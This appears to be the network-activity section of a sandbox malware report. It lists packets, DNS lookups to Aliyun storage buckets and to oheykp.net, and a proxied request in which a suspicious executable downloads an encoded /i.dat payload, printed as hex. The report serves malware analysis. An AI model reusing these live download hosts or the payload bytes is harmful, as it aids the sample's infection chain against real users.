Jan 6, 2025 04:51:45.234893084 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.236181974 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.236241102 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.240550041 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.240621090 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.327779055 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.327811956 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.327985048 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.327985048 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.328020096 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.328058004 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.328643084 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.328680992 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.328691959 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.328701019 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.328721046 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.328735113 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.329579115 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.329627991 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.330290079 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.330338001 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.331549883 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.331598043 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.331845045 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.331890106 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.333832026 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.333884954 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419511080 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419540882 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419612885 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419698000 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419698954 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419698954 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419730902 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419749022 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419778109 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419785023 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419795036 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419799089 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419821024 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419826031 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.419850111 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.419881105 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.420367956 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.420404911 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.420413971 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.420420885 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.420440912 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.420461893 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.420937061 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.420979977 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.420990944 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.421041965 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.421047926 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.421056032 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.421097040 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.421638012 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.421693087 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.421713114 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.421753883 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.422147036 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.422205925 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.424514055 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.424568892 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.425522089 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.425575972 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.425658941 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.425712109 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512434959 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512470007 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512511969 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512516022 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512547016 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512562990 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512562990 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512562990 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512587070 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512593985 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512603998 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512612104 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512631893 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512645960 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512651920 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512665033 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512682915 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512770891 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512805939 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512805939 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512814999 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512856007 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512864113 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.512912035 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.512999058 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.513050079 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.513258934 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.513307095 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.516422987 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.516479015 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.518683910 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.518733025 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.520970106 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.521039009 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.525290966 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.525348902 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.527518988 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.527582884 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.531857967 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.531914949 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.534028053 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.534095049 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.536300898 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.536355972 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.540693045 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.540765047 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.542823076 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.542872906 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.547247887 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.547323942 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.549333096 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.549491882 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.551611900 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.551664114 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.555994987 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.556046963 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.558240891 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.558296919 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.562550068 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.562607050 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.564706087 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.564771891 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.569168091 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.569222927 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.571679115 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.571731091 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604702950 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604751110 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604793072 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604796886 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604811907 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604830980 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604847908 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604847908 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604859114 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604888916 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604902029 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604937077 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604942083 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604953051 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.604969025 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.604983091 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.605115891 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.605155945 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.605159998 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.605168104 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.605192900 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.605279922 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.605318069 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.605398893 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.605442047 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.605504990 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.605554104 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.608642101 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.608695984 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.610797882 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.610852003 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.615139961 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.615190029 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.617387056 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.617441893 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.621707916 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.621773005 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.623991966 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.624051094 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.626148939 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.626205921 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.630470037 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.630531073 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.632828951 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.632884026 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.637123108 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.637186050 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.741074085 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.741329908 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.741821051 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.741874933 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.745971918 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.746153116 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.748162031 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.748226881 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.752552986 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.752620935 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.754543066 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.754610062 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.756709099 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.756763935 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.760759115 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.760833979 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.763190031 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.763257980 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.767081022 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.767143965 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.769150019 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.769206047 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.769216061 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.769229889 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.769267082 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.770145893 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.770167112 CET	443	49998	118.178.60.9	192.168.2.6
Jan 6, 2025 04:51:45.770179033 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:45.770220995 CET	49998	443	192.168.2.6	118.178.60.9
Jan 6, 2025 04:51:50.618134975 CET	50000	8917	192.168.2.6	8.217.59.73
Jan 6, 2025 04:51:50.623102903 CET	8917	50000	8.217.59.73	192.168.2.6
Jan 6, 2025 04:51:50.625279903 CET	50000	8917	192.168.2.6	8.217.59.73
Jan 6, 2025 04:51:51.032072067 CET	50000	8917	192.168.2.6	8.217.59.73
Jan 6, 2025 04:51:51.037625074 CET	8917	50000	8.217.59.73	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 04:50:35.445991993 CET	64123	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:50:35.958053112 CET	53	64123	1.1.1.1	192.168.2.6
Jan 6, 2025 04:51:13.455118895 CET	61592	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:51:13.802468061 CET	53	61592	1.1.1.1	192.168.2.6
Jan 6, 2025 04:51:49.781666040 CET	63699	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:51:49.811952114 CET	53	63699	1.1.1.1	192.168.2.6
Jan 6, 2025 04:51:55.848901033 CET	53499	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:51:55.881238937 CET	53	53499	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:01.926074028 CET	51956	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:01.935223103 CET	53	51956	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:08.004079103 CET	61266	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:08.013479948 CET	53	61266	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:14.035593033 CET	59108	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:14.044693947 CET	53	59108	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:20.066888094 CET	59864	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:20.235507965 CET	53	59864	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:26.255903006 CET	56687	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:26.265155077 CET	53	56687	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:32.316668034 CET	49647	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:32.326231956 CET	53	49647	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:38.347834110 CET	50460	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:38.357238054 CET	53	50460	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:44.379062891 CET	50978	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:44.410594940 CET	53	50978	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:50.441668034 CET	51002	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:50.451785088 CET	53	51002	1.1.1.1	192.168.2.6
Jan 6, 2025 04:52:56.473099947 CET	56021	53	192.168.2.6	1.1.1.1
Jan 6, 2025 04:52:56.482466936 CET	53	56021	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 04:50:35.445991993 CET	192.168.2.6	1.1.1.1	0x8188	Standard query (0)	hu5wd1.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:51:13.455118895 CET	192.168.2.6	1.1.1.1	0x38ae	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:51:49.781666040 CET	192.168.2.6	1.1.1.1	0xa687	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:51:55.848901033 CET	192.168.2.6	1.1.1.1	0xf1c9	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:01.926074028 CET	192.168.2.6	1.1.1.1	0xc16b	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:08.004079103 CET	192.168.2.6	1.1.1.1	0x477	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:14.035593033 CET	192.168.2.6	1.1.1.1	0xd707	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:20.066888094 CET	192.168.2.6	1.1.1.1	0x8d8d	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:26.255903006 CET	192.168.2.6	1.1.1.1	0x1d6f	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:32.316668034 CET	192.168.2.6	1.1.1.1	0x76c4	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:38.347834110 CET	192.168.2.6	1.1.1.1	0x765	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:44.379062891 CET	192.168.2.6	1.1.1.1	0x93a8	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:50.441668034 CET	192.168.2.6	1.1.1.1	0x2bc5	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:56.473099947 CET	192.168.2.6	1.1.1.1	0x490f	Standard query (0)	oheykp.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 04:50:35.958053112 CET	1.1.1.1	192.168.2.6	0x8188	No error (0)	hu5wd1.oss-cn-beijing.aliyuncs.com	sc-231t.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 04:50:35.958053112 CET	1.1.1.1	192.168.2.6	0x8188	No error (0)	sc-231t.cn-beijing.oss-adns.aliyuncs.com	sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 04:50:35.958053112 CET	1.1.1.1	192.168.2.6	0x8188	No error (0)	sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.26	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:51:13.802468061 CET	1.1.1.1	192.168.2.6	0x38ae	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 04:51:13.802468061 CET	1.1.1.1	192.168.2.6	0x38ae	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 04:51:13.802468061 CET	1.1.1.1	192.168.2.6	0x38ae	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:51:49.811952114 CET	1.1.1.1	192.168.2.6	0xa687	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:51:55.881238937 CET	1.1.1.1	192.168.2.6	0xf1c9	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:01.935223103 CET	1.1.1.1	192.168.2.6	0xc16b	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:08.013479948 CET	1.1.1.1	192.168.2.6	0x477	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:14.044693947 CET	1.1.1.1	192.168.2.6	0xd707	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:20.235507965 CET	1.1.1.1	192.168.2.6	0x8d8d	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:26.265155077 CET	1.1.1.1	192.168.2.6	0x1d6f	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:32.326231956 CET	1.1.1.1	192.168.2.6	0x76c4	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:38.357238054 CET	1.1.1.1	192.168.2.6	0x765	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:44.410594940 CET	1.1.1.1	192.168.2.6	0x93a8	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:50.451785088 CET	1.1.1.1	192.168.2.6	0x2bc5	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 04:52:56.482466936 CET	1.1.1.1	192.168.2.6	0x490f	Name error (3)	oheykp.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

hu5wd1.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49921	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:37 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:37 UTC	559	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:37 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 677B530D8797BE3230589E9E Accept-Ranges: bytes ETag: "3F830864D62708390D84A4629D88083D" Last-Modified: Sun, 05 Jan 2025 09:01:14 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 17523956267580149674 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: P4MIZNYnCDkNhKRinYgIPQ== x-oss-server-time: 16
2025-01-06 03:50:37 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 58 45 05 47 23 76 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 11 0c 4c 0e 6a 3f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 5b 46 06 44 20 75 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 10 0d 4d 0f 6b 3e 21 Data Ascii: 